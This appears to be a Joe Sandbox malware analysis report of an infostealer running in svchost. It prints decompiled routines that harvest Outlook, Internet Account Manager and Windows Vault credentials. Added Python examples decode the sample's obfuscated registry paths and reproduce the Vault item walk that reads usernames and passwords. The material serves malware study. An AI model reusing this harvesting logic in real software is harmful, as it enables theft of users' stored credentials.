                                                                                                                                        					_t60 = GetProcAddress(_t38, "PStoreCreateInstance");
                                                                                                                                        					_push(0);
                                                                                                                                        					_push(0);
                                                                                                                                        					_push(0);
                                                                                                                                        					_push( &_v8);
                                                                                                                                        					if( *_t60() >= 0 && _v8 != 0) {
                                                                                                                                        						E0BC04A80(_t84, _v8, E0BC05E3A);
                                                                                                                                        						_t63 = _v8;
                                                                                                                                        						_t87 = _t87 + 0xc;
                                                                                                                                        						 *((intOrPtr*)( *_t63 + 8))(_t63);
                                                                                                                                        					}
                                                                                                                                        				}
                                                                                                                                        				E0BC05B39("Software\\Microsoft\\Internet Account Manager\\Accounts", _t78, _t84, "Software\\Microsoft\\Internet Account Manager\\Accounts"); // executed
                                                                                                                                        				_t68 = E0BC08EE2("Software\\Microsoft\\Internet Account Manager\\Accounts", "\\");
                                                                                                                                        				E0BC05C29(_t41, _t41, _t78, _t84, "Identities"); // executed
                                                                                                                                        				E0BC08D3D(_t41);
                                                                                                                                        				_t44 = E0BC08DDA(_t86, 0x80000002, "Software\\Microsoft\\Internet Account Manager", "Outlook", 0, 0); // executed
                                                                                                                                        				_t88 = _t87 + 0x2c;
                                                                                                                                        				if(_t44 != 0) {
                                                                                                                                        					_t68 = E0BC08F32(_t44, "\\Accounts");
                                                                                                                                        					E0BC05B39(_t57, _t78, _t84, _t57);
                                                                                                                                        					E0BC08D3D(_t57);
                                                                                                                                        					_t88 = _t88 + 0x14;
                                                                                                                                        				}
                                                                                                                                        				E0BC05B39(_t68, _t78, _t84, _v12); // executed
                                                                                                                                        				E0BC05C29(_t68, 0, _t78, _t84, _v16); // executed
                                                                                                                                        				E0BC05C29(_t68, 0, _t78, _t84, _v20); // executed
                                                                                                                                        				E0BC05C29(_t68, 0, _t78, _t84, _v24); // executed
                                                                                                                                        				E0BC05C29(_t68, 0, _t78, _t84, _v28); // executed
                                                                                                                                        				E0BC08D0C(_t84, _t86, 0);
                                                                                                                                        				LocalFree(_v32);
                                                                                                                                        				LocalFree(_v36);
                                                                                                                                        				LocalFree(_v40);
                                                                                                                                        				LocalFree(_v44);
                                                                                                                                        				return LocalFree(_v48);
                                                                                                                                        			}
Instruction addresses of the listing above:
0x0bc06007 0x0bc06015 0x0bc0601a 0x0bc0601d 0x0bc06022 0x0bc06027 0x0bc06029 0x0bc06029 0x0bc06031 0x0bc06036 0x0bc06039 0x0bc0603e 0x0bc06040 0x0bc06040 0x0bc06048 0x0bc0604d 0x0bc06050 0x0bc06055 0x0bc06057 0x0bc06057
0x0bc0605f 0x0bc06064 0x0bc06067 0x0bc0606c 0x0bc0606e 0x0bc0606e 0x0bc06076 0x0bc0607b 0x0bc0607e 0x0bc06081 0x0bc06083 0x0bc06085 0x0bc06085 0x0bc06088 0x0bc06094 0x0bc06096 0x0bc0609d 0x0bc060a7 0x0bc060af 0x0bc060b5
0x0bc060b6 0x0bc060b7 0x0bc060bb 0x0bc060c0 0x0bc060d0 0x0bc060d5 0x0bc060da 0x0bc060de 0x0bc060de 0x0bc060c0 0x0bc060e8 0x0bc060f9 0x0bc06103 0x0bc06109 0x0bc06121 0x0bc06126 0x0bc0612b 0x0bc06138 0x0bc0613c 0x0bc06142
0x0bc06147 0x0bc06147 0x0bc0614e 0x0bc06159 0x0bc06164 0x0bc0616f 0x0bc0617a 0x0bc06186 0x0bc06194 0x0bc06199 0x0bc0619e 0x0bc061a3 0x0bc061ae

                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 0BC088C9: lstrlenA.KERNEL32(6ulekscV\JbDggHg\Xv3Db 6HRRLQ5g\6v2R9DpH\TL3pvgv2R\kLQEv9g\JAppHQRaHpgLvQ\s44JvQRDLQHp\6RvpD5H\OL3pvgv2R.OL3pvgv2RHE5HCi9HrwfdEiff9H\TL3pvgv2RVE5H\1QRHbbLlvpOg\lvpOoDRD), ref: 0BC0894B
                                                                                                                                          • Part of subcall function 0BC088C9: LocalAlloc.KERNEL32(00000040,-00000004), ref: 0BC08957
                                                                                                                                          • Part of subcall function 0BC088C9: lstrcpyA.KERNEL32(00000000,6ulekscV\JbDggHg\Xv3Db 6HRRLQ5g\6v2R9DpH\TL3pvgv2R\kLQEv9g\JAppHQRaHpgLvQ\s44JvQRDLQHp\6RvpD5H\OL3pvgv2R.OL3pvgv2RHE5HCi9HrwfdEiff9H\TL3pvgv2RVE5H\1QRHbbLlvpOg\lvpOoDRD), ref: 0BC08961
                                                                                                                                        • LoadLibraryA.KERNEL32(0000005E), ref: 0BC0609D
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,PStoreCreateInstance), ref: 0BC060AF
                                                                                                                                          • Part of subcall function 0BC05C29: RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 0BC05C61
                                                                                                                                          • Part of subcall function 0BC05C29: RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 0BC05D0B
                                                                                                                                          • Part of subcall function 0BC05C29: RegCloseKey.ADVAPI32(?), ref: 0BC05D17
                                                                                                                                        • LocalFree.KERNEL32(?), ref: 0BC06194
                                                                                                                                        • LocalFree.KERNEL32(?), ref: 0BC06199
                                                                                                                                        • LocalFree.KERNEL32(?), ref: 0BC0619E
                                                                                                                                        • LocalFree.KERNEL32(?), ref: 0BC061A3
                                                                                                                                        • LocalFree.KERNEL32(?), ref: 0BC061A8
                                                                                                                                        Strings
                                                                                                                                        • Identities, xrefs: 0BC060FB
                                                                                                                                        • PStoreCreateInstance, xrefs: 0BC060A9
                                                                                                                                        • Software\Microsoft\Internet Account Manager, xrefs: 0BC06117
                                                                                                                                        • Pstorec.dll, xrefs: 0BC06096
                                                                                                                                        • 6v2R9DpH\TL3pvgv2R\u22L3H\hW.G\uARbvvr\Ipv2LbHg\uARbvvr, xrefs: 0BC06071
                                                                                                                                        • 6v2R9DpH\TL3pvgv2R\kLQEv9g Ke\JAppHQRaHpgLvQ\kLQEv9g THggD5LQ5 6AfgwgRHO\Ipv2LbHg\uARbvvr, xrefs: 0BC06043
                                                                                                                                        • 6v2R9DpH\TL3pvgv2R\kLQEv9g Ke\JAppHQRaHpgLvQ\kLQEv9g THggD5LQ5 6AfgwgRHO\Ipv2LbHg\TL3pvgv2R uARbvvr 1QRHpQHR 6HRRLQ5g, xrefs: 0BC0602C
                                                                                                                                        • 6v2R9DpH\TL3pvgv2R\u22L3H\h8.G\uARbvvr\Ipv2LbHg\uARbvvr, xrefs: 0BC0605A
                                                                                                                                        • 6v2R9DpH\TL3pvgv2R\u22L3H\uARbvvr\uT1 s33vAQR TDQD5Hp\s33vAQRg, xrefs: 0BC06010
                                                                                                                                        • Outlook, xrefs: 0BC06112
                                                                                                                                        • \Accounts, xrefs: 0BC0612D
                                                                                                                                        • Software\Microsoft\Internet Account Manager\Accounts, xrefs: 0BC060E1, 0BC060E6
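The five obfuscated strings in this function, and the lstrlenA argument listed under subcall E0BC088C9, use one fixed per-byte substitution alphabet, which is why fragments such as 6v2R9DpH and s33vAQRg recur wherever a path contains Software or Accounts. The Python below is an added example, not code from the sample or from Joe Sandbox: it recovers the substitution table from two cribs and decodes the remaining strings. Assumptions: the crib plaintexts are the real Outlook profile key Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook and the Edge IntelliForms FormData key, which the two ciphertexts are presumed to encode; learn_table raises if the cribs contradict each other, so a wrong crib is caught rather than silently producing garbage. The version digits in the two Office\h8.G and Office\hW.G paths are covered by neither crib and are emitted as ? rather than guessed.

```python
"""Known-plaintext recovery of the per-byte substitution used for the
registry paths in this function. Added example, not the sample's own
decoder and not Joe Sandbox code. The crib plaintexts are assumptions."""

# Cribs: (ciphertext exactly as printed in the listing, assumed plaintext).
# Crib 1: string at xref 0BC06043, assumed to be the Outlook profile key.
# Crib 2: lstrlenA argument under subcall E0BC088C9, assumed to be the
#         Edge IntelliForms FormData key.
CRIBS = [
    (r"6v2R9DpH\TL3pvgv2R\kLQEv9g Ke\JAppHQRaHpgLvQ\kLQEv9g THggD5LQ5 6AfgwgRHO\Ipv2LbHg\uARbvvr",
     r"Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook"),
    (r"6ulekscV\JbDggHg\Xv3Db 6HRRLQ5g\6v2R9DpH\TL3pvgv2R\kLQEv9g\JAppHQRaHpgLvQ\s44JvQRDLQHp\6RvpD5H\OL3pvgv2R.OL3pvgv2RHE5HCi9HrwfdEiff9H\TL3pvgv2RVE5H\1QRHbbLlvpOg\lvpOoDRD",
     r"SOFTWARE\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\IntelliForms\FormData"),
]

UNKNOWN = "?"  # placeholder for cipher bytes no crib covers


def learn_table(cribs):
    """Build the cipher->plain map from the cribs.

    Raises ValueError on a length mismatch or on two cribs mapping the
    same cipher byte to different plaintext bytes, i.e. when the data
    is not a fixed 1:1 substitution (or a crib plaintext is wrong)."""
    table = {}
    for cipher, plain in cribs:
        if len(cipher) != len(plain):
            raise ValueError("crib lengths differ; not a 1:1 substitution")
        for c, p in zip(cipher, plain):
            if table.setdefault(c, p) != p:
                raise ValueError(f"conflict for {c!r}: {table[c]!r} vs {p!r}")
    return table


def decode_string(cipher, table):
    """Decode with the learned table; uncovered bytes become UNKNOWN."""
    return "".join(table.get(c, UNKNOWN) for c in cipher)


def unresolved(cipher, table):
    """Cipher bytes that no crib covered, so the reader knows what is a guess."""
    return sorted({c for c in cipher if c not in table})


TABLE = learn_table(CRIBS)

# The other obfuscated strings of this function
# (xrefs 0BC06010, 0BC0602C, 0BC0605A, 0BC06071).
TARGETS = [
    r"6v2R9DpH\TL3pvgv2R\u22L3H\uARbvvr\uT1 s33vAQR TDQD5Hp\s33vAQRg",
    r"6v2R9DpH\TL3pvgv2R\kLQEv9g Ke\JAppHQRaHpgLvQ\kLQEv9g THggD5LQ5 6AfgwgRHO\Ipv2LbHg\TL3pvgv2R uARbvvr 1QRHpQHR 6HRRLQ5g",
    r"6v2R9DpH\TL3pvgv2R\u22L3H\h8.G\uARbvvr\Ipv2LbHg\uARbvvr",
    r"6v2R9DpH\TL3pvgv2R\u22L3H\hW.G\uARbvvr\Ipv2LbHg\uARbvvr",
]

if __name__ == "__main__":
    for target in TARGETS:
        print(decode_string(target, TABLE), unresolved(target, TABLE))
```

Running the block decodes the OMI Account Manager and Microsoft Outlook Internet Settings paths completely; the two Office profile paths decode except for the three version characters, which this listing cannot resolve because RegOpenKeyA's path argument is shown only as ? in the API list above.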
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000C.00000002.481704878.000000000BC00000.00000040.00000001.sdmp, Offset: 0BC00000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_12_2_bc00000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Local$Free$AddressAllocCloseEnumLibraryLoadOpenProclstrcpylstrlen
                                                                                                                                        • String ID: 6v2R9DpH\TL3pvgv2R\kLQEv9g Ke\JAppHQRaHpgLvQ\kLQEv9g THggD5LQ5 6AfgwgRHO\Ipv2LbHg\TL3pvgv2R uARbvvr 1QRHpQHR 6HRRLQ5g$6v2R9DpH\TL3pvgv2R\kLQEv9g Ke\JAppHQRaHpgLvQ\kLQEv9g THggD5LQ5 6AfgwgRHO\Ipv2LbHg\uARbvvr$6v2R9DpH\TL3pvgv2R\u22L3H\h8.G\uARbvvr\Ipv2LbHg\uARbvvr$6v2R9DpH\TL3pvgv2R\u22L3H\hW.G\uARbvvr\Ipv2LbHg\uARbvvr$6v2R9DpH\TL3pvgv2R\u22L3H\uARbvvr\uT1 s33vAQR TDQD5Hp\s33vAQRg$Identities$Outlook$PStoreCreateInstance$Pstorec.dll$Software\Microsoft\Internet Account Manager$Software\Microsoft\Internet Account Manager\Accounts$\Accounts
                                                                                                                                        • API String ID: 793178860-2718115194
                                                                                                                                        • Opcode ID: 351eaf3ff6691b5f22d23302e0822f6aa8e42089d195fded95e2404c4e82b2fa
                                                                                                                                        • Instruction ID: 59bbca871870937cea84bab05b04f6b05cf9a146f61a11dd1987199561f02a25
                                                                                                                                        • Opcode Fuzzy Hash: 351eaf3ff6691b5f22d23302e0822f6aa8e42089d195fded95e2404c4e82b2fa
                                                                                                                                        • Instruction Fuzzy Hash: 7741A570E70206AFDF017FB58C8296FBAB9EF58244F104479E505F61C0DE718A41AB71
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 100.00%

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
Control-flow graph (basic block: address range, notable calls -> successor blocks):
• 328 bc0526c-bc0529a LoadLibraryA -> 329, 330
• 329 bc052a0-bc05322 GetProcAddress * 7 -> 330, 334
• 330 bc05538-bc05546 call bc09fdc (exit)
• 334 bc05328 -> 335
• 335 bc0532e-bc0534b -> 337, 338
• 337 bc05351-bc05364 -> 339
• 338 bc05519-bc05532 -> 330, 335
• 339 bc05370-bc05372 -> 338, 340
• 340 bc05378-bc05384 -> 341, 342
• 341 bc0538a-bc05390 -> 343
• 342 bc0550d -> 338
• 343 bc05396-bc053c3 call bc08d5e GetVersionExA -> 346, 347
• 346 bc053c5-bc053cc -> 347, 348
• 347 bc053ce-bc053d5 -> 349, 350
• 348 bc053e8-bc05402 call bc08d75 -> 355, 356
• 349 bc0546a-bc05484 call bc08d75 -> 355, 357
• 350 bc053db-bc053e2 -> 348, 349
• 355 bc054e7-bc05507 -> 342, 343
• 356 bc05408-bc0543b -> 355, 360
• 357 bc05486-bc054b8 -> 355, 361
• 360 bc05441-bc05468 call bc04bbb -> 366
• 361 bc054ba-bc054db call bc04bbb -> 366
• 366 bc054e1 -> 355
C-Code - Quality: 24%
// E0BC0526C: harvests stored credentials from the Windows Vault through vaultcli.dll.
// Every Vault* export is resolved at run time with GetProcAddress, so none of them
// appears in the import table. _a4 is passed through to the collector E0BC04BBB.
E0BC0526C(intOrPtr _a4) {
    signed int _v12;                    // /GS stack cookie (cookie ^ ebp)
    struct _OSVERSIONINFOA _v168;
    _Unknown_base(*)()* _v172;          // VaultEnumerateVaults; afterwards reused as the vault loop index
    struct HINSTANCE__* _v176;          // item loop index
    _Unknown_base(*)()* _v180;          // VaultFree
    struct HINSTANCE__* _v184;          // byte offset into the item array, Windows 8+ stride (0x38)
    _Unknown_base(*)()* _v188;          // byte offset into the vault GUID array (stride 0x10)
    char _v192;                         // vault handle from VaultOpenVault
    struct HINSTANCE__* _v196;          // item returned by VaultGetItem (7-argument prototype)
    struct HINSTANCE__* _v200;          // byte offset into the item array, Windows 7 stride (0x34)
    struct HINSTANCE__* _v204;          // item returned by VaultGetItem (8-argument prototype)
    char _v208;                         // item array from VaultEnumerateItems
    intOrPtr _v212;                     // identity string of the current item
    intOrPtr _v216;                     // copy of _a4
    char _v220;                         // vault count
    char _v224;                         // item count
    _Unknown_base(*)()* _v228;          // VaultGetItem, called with the 8-argument (Windows 8+) prototype
    _Unknown_base(*)()* _v232;          // VaultGetItem, called with the 7-argument (Windows 7) prototype
    char _v236;                         // vault GUID array
    _Unknown_base(*)()* _v240;          // VaultEnumerateItems
    _Unknown_base(*)()* _v244;          // VaultOpenVault
    char _v268;
    void* __ebx;
    void* __edi;
    void* __esi;
    signed int _t87;
    _Unknown_base(*)()* _t94;
    intOrPtr _t114;
    intOrPtr _t123;
    struct HINSTANCE__* _t129;
    intOrPtr _t136;
    intOrPtr _t137;
    CHAR* _t141;
    void* _t142;
    signed int _t145;
    void* _t146;

    _t87 =  *0xbc10000; // 0xbb40e64e (security cookie)
    _v12 = _t87 ^ _t145;
    _v216 = _a4;
    _t90 = LoadLibraryA("vaultcli.dll"); // executed
    _t129 = _t90;
    if(_t129 != 0) {
        _t142 = GetProcAddress;
        _v240 = GetProcAddress(_t129, "VaultEnumerateItems");
        _v172 = GetProcAddress(_t129, "VaultEnumerateVaults");
        _t94 = GetProcAddress(_t129, "VaultFree");
        _t141 = "VaultGetItem";
        _v180 = _t94;
        // The same export is resolved twice; the two copies are called with different
        // prototypes depending on the OS version (see the GetVersionExA check below).
        _v232 = GetProcAddress(_t129, _t141);
        _v228 = GetProcAddress(_t129, _t141);
        _v244 = GetProcAddress(_t129, "VaultOpenVault");
        GetProcAddress(_t129, "VaultCloseVault"); // result discarded: opened vaults are never closed
        _t129 = 0;
        // VaultEnumerateVaults(0, &count, &guids); the GUID array is never released either
        _t90 = _v172(0,  &_v220,  &_v236);
        _v172 = 0;
        if(_v220 > 0) {
            _v188 = 0;
            do {
                // VaultOpenVault(&guids[i], 0, &handle)
                _push( &_v192);
                _push(_t129);
                _push(_v188 + _v236); // executed
                if(_v244() == 0) {
                    // VaultEnumerateItems(handle, 0x200, &count, &items); 0x200 is the same
                    // "all items" flag value that public Vault dumping tools use
                    _push( &_v208);
                    _push( &_v224);
                    _push(0x200);
                    _push(_v192);
                    if(_v240() == 0) {
                        _v176 = _t129;
                        if(_v224 > _t129) {
                            _v200 = _t129;
                            _v184 = _t129;
                            do {
                                E0BC08D5E( &_v268,  &_v268, _t129, 0x18); // likely a memset-style clear of the 0x18-byte local
                                _v168.dwOSVersionInfoSize = 0x94;
                                GetVersionExA( &_v168);
                                // VAULT_ITEM gained a PackageSid pointer in Windows 8. The three pointers read here
                                // (+0x14 resource, +0x18 identity, +0x1c authenticator) keep their offsets, but the
                                // item stride grows from 0x34 to 0x38 and VaultGetItem takes one more argument.
                                // The 8-argument path is taken for (platform 2, major > 6) or (major 6, minor > 1).
                                if(_v168.dwPlatformId != 2 || _v168.dwMajorVersion <= 6) {
                                    if(_v168.dwMinorVersion <= 1 || _v168.dwMajorVersion != 6) {
                                        _t142 = _v200 + _v208; // items[i], Windows 7 layout
                                        // only items for which this comparison against the constant at 0xbc10014 is non-zero are fetched
                                        if(E0BC08D75(_t142, 0xbc10014) != 0) {
                                            _t137 =  *((intOrPtr*)(_t142 + 0x18)); // pIdentityElement
                                            _t114 =  *((intOrPtr*)(_t142 + 0x14)); // pResourceElement
                                            _t141 =  *(_t114 + 0x10);              // resource string (element data at +0x10)
                                            _v212 =  *((intOrPtr*)(_t137 + 0x10)); // identity string
                                            _t138 =  &_v196;
                                            // VaultGetItem(handle, &item->SchemaId, pResource, pIdentity, hwndOwner = 0, flags = 0, &out)
                                            _push( &_v196);
                                            _push(_t129);
                                            _push(_t129);
                                            _push(_t137);
                                            _push(_t114);
                                            _push(_t142);
                                            _push(_v192);
                                            _v196 = _t129;
                                            if(_v232() == _t129) {
                                                // collector(_a4, identity element, resource, identity, authenticator string
                                                // read from the returned item's pAuthenticatorElement (+0x1c) at +0x10)
                                                E0BC04BBB(_v216, _t137, _t141, _v212,  *((intOrPtr*)( *((intOrPtr*)(_v196 + 0x1c)) + 0x10)));
                                                _t146 = _t146 + 0xc;
                                                _push(_v196);
                                                goto L17;
                                            }
                                        }
                                    } else {
                                        goto L11;
                                    }
                                } else {
                                    L11:
                                    _t142 = _v184 + _v208; // items[i], Windows 8+ layout
                                    if(E0BC08D75(_t142, 0xbc10014) != 0) {
                                        _t136 =  *((intOrPtr*)(_t142 + 0x18)); // pIdentityElement
                                        _t123 =  *((intOrPtr*)(_t142 + 0x14)); // pResourceElement
                                        _t141 =  *(_t123 + 0x10);              // resource string
                                        _v212 =  *((intOrPtr*)(_t136 + 0x10)); // identity string
                                        _t138 =  &_v204;
                                        // VaultGetItem(handle, &item->SchemaId, pResource, pIdentity, packageSid = 0, hwndOwner = 0, flags = 0, &out)
                                        _push( &_v204);
                                        _push(_t129);
                                        _push(_t129);
                                        _push(_t129);
                                        _push(_t136);
                                        _push(_t123);
                                        _push(_t142);
                                        _push(_v192);
                                        _v204 = _t129;
                                        if(_v228() == _t129) {
                                            E0BC04BBB(_v216, _t136, _t141, _v212,  *((intOrPtr*)( *((intOrPtr*)(_v204 + 0x1c)) + 0x10)));
                                            _t146 = _t146 + 0xc;
                                            _push(_v204);
                                            L17:
                                            _v180(); // VaultFree(returned item)
                                        }
                                    }
                                }
                                _v176 =  &(_v176->i);
                                _v184 = _v184 + 0x38; // sizeof(VAULT_ITEM) on Windows 8+
                                _v200 = _v200 + 0x34; // sizeof(VAULT_ITEM) on Windows 7
                            } while (_v176 < _v224);
                        }
                        _v180(_v208); // VaultFree(items)
                    }
                }
                _v172 =  &(_v172->i);
                _t90 = _v172;
                _v188 = _v188 + 0x10; // sizeof(GUID)
            } while (_v172 < _v220);
        }
    }
    return E0BC09FDC(_t90, _t129, _v12 ^ _t145, _t138, _t141, _t142); // stack cookie check epilogue
}
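The routine above reads fixed offsets out of the Vault item array and switches the item stride on the reported OS version. The following Python is an added example, not code from this report or from the sample: it reconstructs that walk over a constructed 32-bit memory image so the offsets (+0x14, +0x18, +0x1c, element data at +0x10) and both strides (0x34, 0x38) can be exercised, and shows that walking a Windows 8 array with the Windows 7 stride (or the reverse) breaks at the second item. Structure layouts follow the public, unofficial vaultcli definitions; the `Image` helper, the element and item builders, the image base address and the credentials are all assumptions made for this example.

```python
# Added example (not from the report or the sample): models the VAULT_ITEM /
# VAULT_ITEM_ELEMENT layout that E0BC0526C walks. Layouts follow the public,
# unofficial vaultcli definitions; image base, helpers and credentials are constructed.
import struct

STRIDE_WIN7 = 0x34        # sizeof(VAULT_ITEM) on Windows 7
STRIDE_WIN8 = 0x38        # sizeof(VAULT_ITEM) on Windows 8+ (adds a PackageSid pointer)
OFF_RESOURCE = 0x14       # pResourceElement
OFF_IDENTITY = 0x18       # pIdentityElement
OFF_AUTHENTICATOR = 0x1C  # pAuthenticatorElement
OFF_ELEMENT_DATA = 0x10   # data union inside VAULT_ITEM_ELEMENT (32-bit build)
ELEMENT_TYPE_STRING = 7   # VAULT_ELEMENT_TYPE value for a PWSTR element


def pick_stride(platform_id, major, minor):
    """Mirror the decompiled GetVersionExA dispatch exactly, including its quirk
    that a non-NT platform id always selects the Windows 7 layout."""
    if platform_id != 2 or major <= 6:
        if minor <= 1 or major != 6:
            return STRIDE_WIN7
        return STRIDE_WIN8
    return STRIDE_WIN8


class Image:
    """Flat little-endian 32-bit memory image starting at `base` (assumed)."""

    def __init__(self, base):
        self.base = base
        self.buf = bytearray()

    def put(self, data):
        """Append `data`, return its address, keep 4-byte alignment."""
        addr = self.base + len(self.buf)
        self.buf += data
        self.buf += b"\0" * (-len(self.buf) % 4)
        return addr

    def u32(self, addr):
        off = addr - self.base
        if not 0 <= off <= len(self.buf) - 4:
            raise ValueError("read outside image: 0x%08x" % addr)
        return struct.unpack_from("<I", self.buf, off)[0]

    def wstr(self, addr):
        """Read a NUL-terminated UTF-16LE string."""
        off = addr - self.base
        if not 0 <= off < len(self.buf):
            raise ValueError("read outside image: 0x%08x" % addr)
        end = off
        while end + 1 < len(self.buf) and self.buf[end:end + 2] != b"\0\0":
            end += 2
        return self.buf[off:end].decode("utf-16-le")


def put_string_element(img, schema_element_id, text):
    """VAULT_ITEM_ELEMENT {SchemaElementId, 0, Type, 0, PWSTR data}."""
    s = img.put(text.encode("utf-16-le") + b"\0\0")
    return img.put(struct.pack("<IIIII", schema_element_id, 0, ELEMENT_TYPE_STRING, 0, s))


def build_item_array(img, stride, creds):
    """Lay `creds` out as a contiguous VAULT_ITEM array of the given stride.
    Simplification: the real API only fills pAuthenticatorElement in the item
    that VaultGetItem returns; here it is populated in the enumerated item."""
    items = []
    for name, resource, identity, authenticator in creds:
        name_p = img.put(name.encode("utf-16-le") + b"\0\0")
        ptrs = struct.pack("<IIII", name_p,
                           put_string_element(img, 1, resource),
                           put_string_element(img, 2, identity),
                           put_string_element(img, 3, authenticator))
        body = b"\x11" * 16 + ptrs                 # SchemaId (constructed GUID) + 4 pointers
        if stride == STRIDE_WIN8:
            body += struct.pack("<I", 0)           # pPackageSid, Windows 8+ only
        body += struct.pack("<QIII", 0, 0, 0, 0)   # LastModified, dwFlags, dwPropertiesCount, pPropertyElements
        assert len(body) == stride
        items.append(body)
    return img.put(b"".join(items))


def harvest(img, items_addr, count, stride):
    """The decompiled loop in Python: for items[i] read the three element
    pointers, then the wide string each element's data field points at."""
    out = []
    for i in range(count):
        item = items_addr + i * stride
        fields = []
        for off in (OFF_RESOURCE, OFF_IDENTITY, OFF_AUTHENTICATOR):
            elem = img.u32(item + off)
            fields.append(img.wstr(img.u32(elem + OFF_ELEMENT_DATA)))
        out.append(tuple(fields))
    return out


def demo():
    """Walk both layouts with the right stride, then with the wrong one."""
    creds = [  # constructed sample data
        ("Web credential", "https://intranet.example", "alice", "hunter2"),
        ("Windows credential", "TERMSRV/fileserver", "CORP\\bob", "P@ssw0rd!"),
    ]
    expected = [c[1:] for c in creds]
    results = {}
    for label, stride in (("win7", STRIDE_WIN7), ("win8", STRIDE_WIN8)):
        img = Image(0x00500000)
        items = build_item_array(img, stride, creds)
        results[label] = harvest(img, items, len(creds), stride)
        wrong = STRIDE_WIN8 if stride == STRIDE_WIN7 else STRIDE_WIN7
        try:   # the wrong stride lands items[1] mid-structure: bogus pointers
            results[label + "_wrong_stride"] = harvest(img, items, len(creds), wrong)
        except ValueError:
            results[label + "_wrong_stride"] = None
    return expected, results


if __name__ == "__main__":
    expected, results = demo()
    for label, got in results.items():
        print(label, "OK" if got == expected else "mismatch", got)
```

`pick_stride` reproduces the sample's version test rather than a clean one, so it also reproduces its quirk: a platform id other than 2 always falls through to the Windows 7 layout. In `demo` the first item parses correctly under either stride because both layouts share the offsets the code reads; only the second item exposes the mismatch, which is why the sample has to get the stride right before touching anything but items[0].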
Instruction address column of the disassembly listing for E0BC0526C (the instruction text column is not present in this extraction):
0x0bc05275 0x0bc0527c 0x0bc0528a 0x0bc05290 0x0bc05296 0x0bc0529a 0x0bc052a0 0x0bc052b4 0x0bc052c2 0x0bc052c8
0x0bc052ca 0x0bc052d1 0x0bc052db 0x0bc052e9 0x0bc052f7 0x0bc052fd 0x0bc0530d 0x0bc05310 0x0bc05316 0x0bc05322
0x0bc05328 0x0bc0532e 0x0bc05340 0x0bc05341 0x0bc05342 0x0bc0534b 0x0bc05357 0x0bc0535e 0x0bc0535f 0x0bc05364
0x0bc05372 0x0bc05378 0x0bc05384 0x0bc0538a 0x0bc05390 0x0bc05396 0x0bc053a0 0x0bc053ac 0x0bc053b6 0x0bc053c3
0x0bc053d5 0x0bc05470 0x0bc05484 0x0bc05486 0x0bc0548c 0x0bc0548f 0x0bc05492 0x0bc05498 0x0bc0549e 0x0bc0549f
0x0bc054a0 0x0bc054a1 0x0bc054a2 0x0bc054a3 0x0bc054a4 0x0bc054aa 0x0bc054b8 0x0bc054d3 0x0bc054d8 0x0bc054db
0x00000000 0x0bc054db 0x0bc054b8 0x00000000 0x00000000 0x00000000 0x0bc053e8 0x0bc053e8 0x0bc053ee 0x0bc05402
                                                                                                                                        0x0bc05408
                                                                                                                                        0x0bc0540e
                                                                                                                                        0x0bc05411
                                                                                                                                        0x0bc05414
                                                                                                                                        0x0bc0541a
                                                                                                                                        0x0bc05420
                                                                                                                                        0x0bc05421
                                                                                                                                        0x0bc05422
                                                                                                                                        0x0bc05423
                                                                                                                                        0x0bc05424
                                                                                                                                        0x0bc05425
                                                                                                                                        0x0bc05426
                                                                                                                                        0x0bc05427
                                                                                                                                        0x0bc0542d
                                                                                                                                        0x0bc0543b
                                                                                                                                        0x0bc0545a
                                                                                                                                        0x0bc0545f
                                                                                                                                        0x0bc05462
                                                                                                                                        0x0bc054e1
                                                                                                                                        0x0bc054e1
                                                                                                                                        0x0bc054e1
                                                                                                                                        0x0bc0543b
                                                                                                                                        0x0bc05402
                                                                                                                                        0x0bc054e7
                                                                                                                                        0x0bc054f3
                                                                                                                                        0x0bc054fa
                                                                                                                                        0x0bc05501
                                                                                                                                        0x0bc05396
                                                                                                                                        0x0bc05513
                                                                                                                                        0x0bc05513
                                                                                                                                        0x0bc05372
                                                                                                                                        0x0bc05519
                                                                                                                                        0x0bc0551f
                                                                                                                                        0x0bc05525
                                                                                                                                        0x0bc0552c
                                                                                                                                        0x0bc0532e
                                                                                                                                        0x0bc05322
                                                                                                                                        0x0bc05546

APIs
• LoadLibraryA.KERNELBASE(vaultcli.dll), ref: 0BC05290
• GetProcAddress.KERNEL32(00000000,VaultEnumerateItems), ref: 0BC052AC
• GetProcAddress.KERNEL32(00000000,VaultEnumerateVaults), ref: 0BC052BA
• GetProcAddress.KERNEL32(00000000,VaultFree), ref: 0BC052C8
• GetProcAddress.KERNEL32(00000000,VaultGetItem), ref: 0BC052D7
• GetProcAddress.KERNEL32(00000000,VaultGetItem), ref: 0BC052E1
• GetProcAddress.KERNEL32(00000000,VaultOpenVault), ref: 0BC052EF
• GetProcAddress.KERNEL32(00000000,VaultCloseVault), ref: 0BC052FD
• GetVersionExA.KERNEL32(?,?,00000000,00000018), ref: 0BC053B6
Strings
Memory Dump Source
• Source File: 0000000C.00000002.481704878.000000000BC00000.00000040.00000001.sdmp, Offset: 0BC00000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_bc00000_svchost.jbxd
Yara matches
Similarity
• API ID: AddressProc$LibraryLoadVersion
• String ID: 4$8$VaultCloseVault$VaultEnumerateItems$VaultEnumerateVaults$VaultFree$VaultGetItem$VaultOpenVault$vaultcli.dll
• API String ID: 1968650500-2979912482
• Opcode ID: 8771c5a9e9a31658885659092d650af513c87d40bc265846e2240aab715cae5a
• Instruction ID: e2c810f736af279729158471915b07ee90cc0781a4a2fa6f691d0e412b56cbd7
• Opcode Fuzzy Hash: 8771c5a9e9a31658885659092d650af513c87d40bc265846e2240aab715cae5a
